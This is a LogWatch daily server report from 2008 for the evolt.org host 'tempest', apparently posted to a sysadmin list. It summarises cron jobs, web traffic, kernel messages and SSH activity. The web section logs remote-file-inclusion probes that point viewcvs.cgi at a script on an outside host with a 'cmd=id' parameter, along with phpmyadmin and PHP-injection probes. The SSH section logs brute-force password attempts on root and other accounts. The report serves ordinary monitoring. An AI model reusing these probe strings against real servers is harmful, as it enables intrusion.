[Sysadmin] LogWatch for tempest
root
root at tempest.evolt.org
Wed Apr 9 06:25:41 CDT 2008
################### LogWatch 5.2.2 (06/23/04) ####################
Processing Initiated: Wed Apr 9 06:25:18 2008
Date Range Processed: yesterday
Detail Level of Output: 10
Logfiles for Host: tempest
################################################################
--------------------- Cron Begin ------------------------
Commands Run:
User dkaufman:
/bin/date > $HOME/date.txt: 1440 Time(s)
User dmah:
/home/dmah/bin/article_reminder.pl: 1 Time(s)
/home/dmah/bin/comment_reminder.pl: 1 Time(s)
User mailman:
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/checkdbs: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/disabled: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/gate_news: 288 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/nightly_gzip: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/senddigests: 1 Time(s)
User root:
run-parts --report /etc/cron.hourly: 24 Time(s)
[ -d /var/lib/php4 ] && find /var/lib/php4/ -type f -cmin +$(/usr/lib/php4/maxlifetime) -print0 | xargs -r -0 rm: 48 Time(s)
/store/host/browsers.evolt.org/mkarchivesize: 1 Time(s)
/usr/bin/freshclam --quiet -l /var/log/clam-update.log: 1 Time(s)
/usr/local/bin/planetupdate 1>/dev/null 2>&1: 24 Time(s)
/usr/sbin/ntpdate -su us.pool.ntp.org us.pool.ntp.org: 1 Time(s)
/var/qmail/bin/qmailstats 1>/dev/null 2>/dev/null: 1 Time(s)
if [ -x /usr/bin/vnstat ] && [ `ls /var/lib/vnstat/ | wc -l` -ge 1 ]; then /usr/bin/vnstat -u; fi: 288 Time(s)
test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily: 1 Time(s)
test -x /usr/sbin/cron-apt && /usr/sbin/cron-apt: 1 Time(s)
wget -O - -q http://evolt.org/cron.php: 72 Time(s)
User www-data:
[ -x /usr/lib/cgi-bin/awstats.pl -a -f /etc/awstats/awstats.conf -a -r /var/log/apache/access.log ] && /usr/lib/cgi-bin/awstats.pl -config=awstats -update >/dev/null: 144 Time(s)
---------------------- Cron End -------------------------
--------------------- EXIM Begin ------------------------
--- Messages history ---
3 messages delivered immediately to 3 total recipients
---------------------- EXIM End -------------------------
--------------------- httpd Begin ------------------------
9.04 MB transfered in 1089 responses (1xx 0, 2xx 425, 3xx 61, 4xx 603, 5xx 0)
98 Images (0.04 MB),
8 Documents (0.00 MB),
4 Archives (0.00 MB),
728 Content pages (7.96 MB),
4 Redirects (0.00 MB),
32 Program source files (0.35 MB),
215 Other (0.68 MB)
Attempts to use 1 known hacks were logged 82 time(s)
phpmyadmin by
213.123.219.34 6 time(s)
216.211.136.85 76 time(s)
A total of 2 sites probed the server
213.123.219.34
216.211.136.85
A total of 122 unidentified 'other' records logged
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?hideattic=1&r1=1.30&r2=1.9 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?rev=1.10&hideattic=0&only_with_tag=MAIN&view=markup HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolters?r1=1.2&r2=1.3&hideattic=0 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?annotate=http://www.milh0use.xpg.com.br/tool25.txt?&cmd=id HTTP/1.1 with response code(s) 1 400 responses
GET /luminosity? HTTP/1.0 with response code(s) 1 404 responses
GET /mccreath/potatosalad/archives/~amnsnow.mpe HTTP/1.1 with response code(s) 1 404 responses
GET /luminosity? HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=file&r2=1.18&r1=1.22 HTTP/1.0 with response code(s) 1 200 responses
GET /jeff/code/chmod.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/mkarchivesize?sortby=l&r2=1.7&r1=1.6 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?hideattic=0&sortby=fil&view=graph HTTP/1.0 with response code(s) 1 200 responses
GET /faq.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/6alt_rating08.gif?rev=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?only_with_tag=MAIN&r2=1.1&r1=1.7 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=log&r2=1.3&r1=1.20 HTTP/1.0 with response code(s) 1 200 responses
GET /jswiders HTTP/1.1 with response code(s) 1 404 responses
GET /signup.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/grabbag/status/eo.unavail.png?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/red-cube.gif?annotate=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /xmlrpc.php. HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?r1=1.23&r2=1.24&hideattic=0 HTTP/1.0 with response code(s) 1 200 responses
GET /jeff/code/toggle_tablerows.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/rollover_n_click/index.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=l&r2=1.4&r1=1.14 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/logo_print.gif?annotate=1.1&sortby=l HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/grabbag/status/eo.avail.png?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/star.gif?annotate=1.3&hideattic=0 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolters?sortby=author&r2=1.2&r1=1.3 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?rev=1.19&sortby=l&view=markup HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?rev=1.4&sortby=l&view=markup HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/grabbag/status/eo.stale.png?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /rss/articles.rss HTTP/1.0 with response code(s) 2 404 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/favicon.ico?sortby=rev&view=graph HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/6alt_rating05.gif?rev=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=rev&r2=1.1&r1=1.12 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/red-cube.png?rev=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/goldcube.gif?r2=1.4&only_with_tag=MAIN&sortdir=down&r1=1.3 HTTP/1.0 with response code(s) 1 200 responses
GET /garrett/site/books/factual HTTP/1.0 with response code(s) 1 404 responses
- with response code(s) 78 408 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=rev&r2=1.29&r1=1.16 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/rss20.gif?sortby=fil&view=graph HTTP/1.0 with response code(s) 1 200 responses
GET /mantruc/blog HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/6alt_rating05.gif?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.29&r1=1.18&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.28&r1=1.20&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evoltorg.psd?sortdir=down&only_with_tag=MAIN HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/favicon.ico?sortby=file&only_with_tag=v3_0_0 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?r1=1.11&r2=1.12&sortby=l HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/6alt_rating09.gif?rev=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/green-cube.gif?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.10&r1=1.20&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.19&r1=1.20&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/star.gif?annotate=1.3&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-3.png?rev=1.1&view=markup HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.3&r1=1.20&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/star.png?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /shaggy/windows/user, HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/gold-cube.gif?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /turkif HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/gold-cube.png?rev=1.3 HTTP/1.0 with response code(s) 1 200 responses
GET /jeff/code/form_to_window/index.cfm HTTP/1.0 with response code(s) 1 404 responses
HTTP/1.1 200 OK with response code(s) 1 400 responses
GET /jeff/code/table_cell_rollover.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /aleem HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/mkarchivesize?r1=1.9&r2=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.17&r1=1.15&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /arijit/dw_ext HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=date&r2=1.17&r1=1.23 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.3&r1=1.26&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/mkarchivesize?sortby=log&r2=1.3&r1=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/noc/favicon.ico?rev=1.1&hideattic=0&sortby=fil&view=log HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortdir=down&view=graph HTTP/1.0 with response code(s) 1 200 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/49 HTTP/1.1 with response code(s) 1 404 responses
GET /djc HTTP/1.0 with response code(s) 1 404 responses
GET /signup.cfm HTTP/1.1 with response code(s) 5 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/.cvsignore?hideattic=0&only_with_tag=HEAD&r2=1.2&r1=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolters?annotate=1.3 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/mkarchivesize?rev=1.12&view=log HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r2=1.16&r1=1.2&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?r1=1.14&r2=1.15&sortby=log&sortdir=down HTTP/1.0 with response code(s) 1 200 responses
GET /jeff/code/index.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /frymaster HTTP/1.1 with response code(s) 1 404 responses
GET /jeff/code/table_cell_rollover.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/noc/favicon.ico?only_with_tag=MAIN HTTP/1.0 with response code(s) 1 200 responses
GET /jeff/code/dhtml_form_rollover/index.cfm HTTP/1.1 with response code(s) 3 404 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/chkarchivemirror?only_with_tag=MAIN&r2=1.7&r1=1.3 HTTP/1.0 with response code(s) 1 200 responses
GET /Isaac HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/<?php HTTP/1.1 with response code(s) 4 404 responses
GET /jeff/code/dhtml_form_rollover/index.cfm HTTP/1.0 with response code(s) 3 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?annotate=1.13&sortby=l HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/blue-cube.png?rev=1.4 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=l&r2=1.13&r1=1.3 HTTP/1.0 with response code(s) 1 200 responses
GET /Isaac HTTP/1.0 with response code(s) 1 404 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/35 HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/goldcube.gif?annotate=1.3&hideattic=0 HTTP/1.0 with response code(s) 1 200 responses
HTTP/1.1 400 Bad Request with response code(s) 1 400 responses
GET /jeff/code/preload_n_rollover HTTP/1.0 with response code(s) 2 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/user/register HTTP/1.1 with response code(s) 4 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/cubes-0.png?view=markup&sortby=rev&only_with_tag=MAIN HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/Attic/star.png?rev=1.1&view=markup HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/workcube.gif?sortby=log&view=markup HTTP/1.0 with response code(s) 1 200 responses
GET /dshadovi/cf_two_selects.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /program files/easyphp1-8/ main.php HTTP/1.0 with response code(s) 1 400 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=log&r2=1.3&r1=1.27 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/6alt_rating03.gif?rev=1.2 HTTP/1.0 with response code(s) 1 200 responses
HEAD /jeff HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=rev&r2=1.24&r1=1.4 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?annotate=1.12&sortby=l HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?only_with_tag=MAIN&r2=1.17&r1=1.4 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?view=log&only_with_tag=MAIN&sortdir=down&r1=1.4 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/6alt_rating01.gif?rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /jeff/code/preload_n_rollover HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?rev=http://www.milh0use.xpg.com.br/tool25.txt?&cmd=id HTTP/1.1 with response code(s) 1 400 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/cubes-2.png?content-type=text%2Fplain&rev=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolt?sortby=date&r2=1.9&r1=1.27 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/Attic/red-cube.gif?rev=1.2 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?sortby=log&r2=1.11&r1=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /shaggy HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/link_accessibility_usability.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/quotes.png?rev=1.1&sortby=author&view=log HTTP/1.1 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/weo_theme/'.$icon.' HTTP/1.0 with response code(s) 1 404 responses
A total of 8 ROBOTS were logged
Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) 44 time(s)
WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU) 1 time(s)
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 4 time(s)
Nokia6682/2.0 (3.01.1) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 (compatible;YahooSeeker/M1A1-R2D2; http://help.yahoo.com/help/us/ysearch/crawling/crawling-01.html) 1 time(s)
msnbot-media/1.0 (+http://search.msn.com/msnbot.htm) 6 time(s)
larbin_2.6.3 (larbin2.6.3 at unspecified.mail) 1 time(s)
msnbot/1.1 (+http://search.msn.com/msnbot.htm) 9 time(s)
TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html) 1 time(s)
---------------------- httpd End -------------------------
--------------------- Kernel Begin ------------------------
1 Time(s): NET: 1 messages suppressed.
2 Time(s): NET: 10 messages suppressed.
1 Time(s): NET: 12 messages suppressed.
2 Time(s): NET: 14 messages suppressed.
1 Time(s): NET: 16 messages suppressed.
1 Time(s): NET: 17 messages suppressed.
1 Time(s): NET: 18 messages suppressed.
1 Time(s): NET: 22 messages suppressed.
1 Time(s): NET: 24 messages suppressed.
1 Time(s): NET: 29 messages suppressed.
3 Time(s): NET: 3 messages suppressed.
1 Time(s): NET: 35 messages suppressed.
1 Time(s): NET: 36 messages suppressed.
1 Time(s): NET: 38 messages suppressed.
2 Time(s): NET: 4 messages suppressed.
1 Time(s): NET: 49 messages suppressed.
1 Time(s): NET: 5 messages suppressed.
2 Time(s): NET: 6 messages suppressed.
1 Time(s): NET: 62 messages suppressed.
1 Time(s): NET: 64 messages suppressed.
3 Time(s): NET: 7 messages suppressed.
1 Time(s): NET: 74 messages suppressed.
3 Time(s): NET: 8 messages suppressed.
1 Time(s): NET: 9 messages suppressed.
1 Time(s): TCP: Treason uncloaked! Peer 195.166.237.254:8703/80 shrinks window 552762451:552763831. Repaired.
1 Time(s): TCP: drop open request from 124.74.235.126/32012
1 Time(s): TCP: drop open request from 130.95.128.50/43586
1 Time(s): TCP: drop open request from 148.160.18.128/3914
1 Time(s): TCP: drop open request from 148.235.32.34/41577
1 Time(s): TCP: drop open request from 150.214.35.29/60089
1 Time(s): TCP: drop open request from 193.206.15.73/48082
1 Time(s): TCP: drop open request from 193.238.150.122/36085
1 Time(s): TCP: drop open request from 193.252.23.21/36007
1 Time(s): TCP: drop open request from 193.252.23.21/36008
1 Time(s): TCP: drop open request from 194.109.127.151/4350
1 Time(s): TCP: drop open request from 194.109.24.35/2833
1 Time(s): TCP: drop open request from 195.64.165.40/52822
1 Time(s): TCP: drop open request from 195.97.78.194/15750
1 Time(s): TCP: drop open request from 200.166.129.2/16188
1 Time(s): TCP: drop open request from 200.249.236.161/11253
1 Time(s): TCP: drop open request from 202.157.0.210/58832
1 Time(s): TCP: drop open request from 202.239.124.23/45808
1 Time(s): TCP: drop open request from 203.162.145.214/17490
1 Time(s): TCP: drop open request from 204.179.80.4/33609
1 Time(s): TCP: drop open request from 206.166.198.131/52821
1 Time(s): TCP: drop open request from 207.115.20.151/33379
1 Time(s): TCP: drop open request from 207.216.242.224/60160
1 Time(s): TCP: drop open request from 209.239.40.230/33817
1 Time(s): TCP: drop open request from 209.68.2.53/52038
1 Time(s): TCP: drop open request from 210.147.8.13/46580
1 Time(s): TCP: drop open request from 210.150.239.216/50594
1 Time(s): TCP: drop open request from 210.164.34.12/57447
1 Time(s): TCP: drop open request from 210.188.195.117/49757
1 Time(s): TCP: drop open request from 210.233.64.8/53939
1 Time(s): TCP: drop open request from 210.249.136.66/46374
1 Time(s): TCP: drop open request from 212.103.204.75/9029
1 Time(s): TCP: drop open request from 213.145.163.170/39488
1 Time(s): TCP: drop open request from 213.203.193.171/58458
1 Time(s): TCP: drop open request from 213.203.193.171/58459
1 Time(s): TCP: drop open request from 213.3.7.161/27372
1 Time(s): TCP: drop open request from 213.30.178.211/2493
1 Time(s): TCP: drop open request from 216.175.212.138/58314
1 Time(s): TCP: drop open request from 216.183.181.100/22191
1 Time(s): TCP: drop open request from 217.79.77.98/50881
1 Time(s): TCP: drop open request from 218.56.11.178/1715
1 Time(s): TCP: drop open request from 219.110.5.51/35624
1 Time(s): TCP: drop open request from 24.248.215.74/32171
1 Time(s): TCP: drop open request from 24.248.44.114/18699
1 Time(s): TCP: drop open request from 24.97.162.34/44336
1 Time(s): TCP: drop open request from 60.241.239.77/33232
1 Time(s): TCP: drop open request from 60.43.129.27/2148
1 Time(s): TCP: drop open request from 62.236.120.84/47557
1 Time(s): TCP: drop open request from 62.242.255.218/59740
1 Time(s): TCP: drop open request from 64.105.53.165/32343
1 Time(s): TCP: drop open request from 64.132.182.19/18806
1 Time(s): TCP: drop open request from 64.201.170.77/57953
1 Time(s): TCP: drop open request from 64.216.194.253/30847
1 Time(s): TCP: drop open request from 64.233.166.168/59494
1 Time(s): TCP: drop open request from 64.89.89.66/47569
1 Time(s): TCP: drop open request from 66.109.64.157/53041
1 Time(s): TCP: drop open request from 66.152.218.146/14563
1 Time(s): TCP: drop open request from 67.127.63.82/9879
1 Time(s): TCP: drop open request from 67.15.186.28/39892
1 Time(s): TCP: drop open request from 71.216.3.209/14655
1 Time(s): TCP: drop open request from 74.218.88.237/65098
1 Time(s): TCP: drop open request from 74.39.224.151/10153
1 Time(s): TCP: drop open request from 77.75.108.10/55847
1 Time(s): TCP: drop open request from 80.94.52.35/41691
1 Time(s): TCP: drop open request from 81.189.52.8/26778
1 Time(s): TCP: drop open request from 81.28.224.20/38363
1 Time(s): TCP: drop open request from 82.99.69.30/23993
1 Time(s): TCP: drop open request from 88.191.50.78/15708
1 Time(s): UDP: short packet: 12.96.160.107:53 55/39 to 67.19.100.194:42190
1 Time(s): UDP: short packet: 12.96.160.115:53 119/103 to 67.19.100.194:60303
1 Time(s): UDP: short packet: 12.96.160.115:53 146/130 to 67.19.100.194:42826
1 Time(s): UDP: short packet: 12.96.160.115:53 149/133 to 67.19.100.194:60491
1 Time(s): UDP: short packet: 12.96.160.115:53 154/138 to 67.19.100.194:48807
1 Time(s): UDP: short packet: 12.96.160.115:53 155/139 to 67.19.100.194:54228
1 Time(s): UDP: short packet: 12.96.160.115:53 156/140 to 67.19.100.194:15093
1 Time(s): UDP: short packet: 12.96.160.115:53 157/141 to 67.19.100.194:39296
1 Time(s): UDP: short packet: 12.96.160.115:53 157/141 to 67.19.100.194:57028
1 Time(s): UDP: short packet: 12.96.160.115:53 189/173 to 67.19.100.194:36236
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:39654
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:41265
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:43812
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:55532
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:57059
1 Time(s): UDP: short packet: 12.96.160.115:53 218/202 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 222/206 to 67.19.100.194:54491
1 Time(s): UDP: short packet: 12.96.160.115:53 241/225 to 67.19.100.194:55259
1 Time(s): UDP: short packet: 12.96.160.115:53 283/267 to 67.19.100.194:60848
1 Time(s): UDP: short packet: 12.96.160.115:53 313/297 to 67.19.100.194:36402
1 Time(s): UDP: short packet: 12.96.160.115:53 315/299 to 67.19.100.194:36523
1 Time(s): UDP: short packet: 12.96.160.115:53 315/299 to 67.19.100.194:47171
1 Time(s): UDP: short packet: 12.96.160.115:53 414/398 to 67.19.100.194:59085
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:39755
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:45377
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:45977
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:52738
1 Time(s): device eth0 entered promiscuous mode
1 Time(s): device eth0 left promiscuous mode
---------------------- Kernel End -------------------------
--------------------- Named Begin ------------------------
**Unmatched Entries**
notify question section contains no SOA: 1 Time(s)
---------------------- Named End -------------------------
--------------------- pam_unix Begin ------------------------
cron:
Sessions Opened:
dkaufman: 1440 Time(s)
root: 462 Time(s)
mailman: 292 Time(s)
www-data: 144 Time(s)
dmah: 2 Time(s)
sshd:
Sessions Opened:
dmah: 5 Time(s)
su:
Sessions Opened:
dmah(uid=0) -> root: 4 Time(s)
(uid=0) -> nobody: 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- sendmail Begin ------------------------
ERROR: Could not open /etc/mail/local-host-names
ERROR: Could not open /etc/mail/access
Message Size Distribution:
Range # Msgs KBytes
0 - 10k 0 0
10k - 20k 0 0
20k - 50k 0 0
50k - 100k 0 0
100k - 500k 0 0
500k - 1Mb 0 0
1Mb - 2Mb 0 0
2Mb - 5Mb 0 0
5Mb - 10Mb 0 0
10Mb+ 0 0
----------------------------------
TOTAL 0 0
---------------------- sendmail End -------------------------
--------------------- SSHD Begin ------------------------
Didn't receive an ident from these IPs:
61.128.110.190: 5 Time(s)
63-253-165-99.ip.mcleodusa.net (63.253.165.99): 5 Time(s)
Failed logins from these:
admin/password from 211.112.95.3: 1 Time(s)
admin/password from 61.128.110.190: 26 Time(s)
blah/password from 61.128.110.190: 2 Time(s)
clint/password from 61.128.110.190: 1 Time(s)
david/password from 61.128.110.190: 1 Time(s)
ftp/password from 211.112.95.3: 2 Time(s)
horde/password from 61.4.191.84: 3 Time(s)
iceuser/password from 61.4.191.84: 5 Time(s)
jade/password from 61.128.110.190: 5 Time(s)
nobody/password from 61.4.191.84: 5 Time(s)
patrick/password from 61.4.191.84: 10 Time(s)
rolo/password from 61.4.191.84: 5 Time(s)
root/password from 211.112.95.3: 2 Time(s)
root/password from 61.4.191.84: 25 Time(s)
root/password from 63.253.165.99: 220 Time(s)
sales/password from 211.112.95.3: 1 Time(s)
webmaster/password from 211.112.95.3: 2 Time(s)
Illegal users from these:
admin/none from 211.112.95.3: 1 Time(s)
admin/none from 61.128.110.190: 26 Time(s)
admin/password from 211.112.95.3: 1 Time(s)
admin/password from 61.128.110.190: 26 Time(s)
blah/none from 61.128.110.190: 2 Time(s)
blah/password from 61.128.110.190: 2 Time(s)
clint/none from 61.128.110.190: 1 Time(s)
clint/password from 61.128.110.190: 1 Time(s)
david/none from 61.128.110.190: 1 Time(s)
david/password from 61.128.110.190: 1 Time(s)
horde/none from 61.4.191.84: 3 Time(s)
horde/password from 61.4.191.84: 3 Time(s)
iceuser/none from 61.4.191.84: 5 Time(s)
iceuser/password from 61.4.191.84: 5 Time(s)
jade/none from 61.128.110.190: 5 Time(s)
jade/password from 61.128.110.190: 5 Time(s)
patrick/none from 61.4.191.84: 10 Time(s)
patrick/password from 61.4.191.84: 10 Time(s)
rolo/none from 61.4.191.84: 5 Time(s)
rolo/password from 61.4.191.84: 5 Time(s)
sales/none from 211.112.95.3: 1 Time(s)
sales/password from 211.112.95.3: 1 Time(s)
webmaster/none from 211.112.95.3: 2 Time(s)
webmaster/password from 211.112.95.3: 2 Time(s)
Users logging in through sshd:
dmah:
S010600c049d9e99b.cg.shawcable.net (70.73.105.151): 5 times
**Unmatched Entries**
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
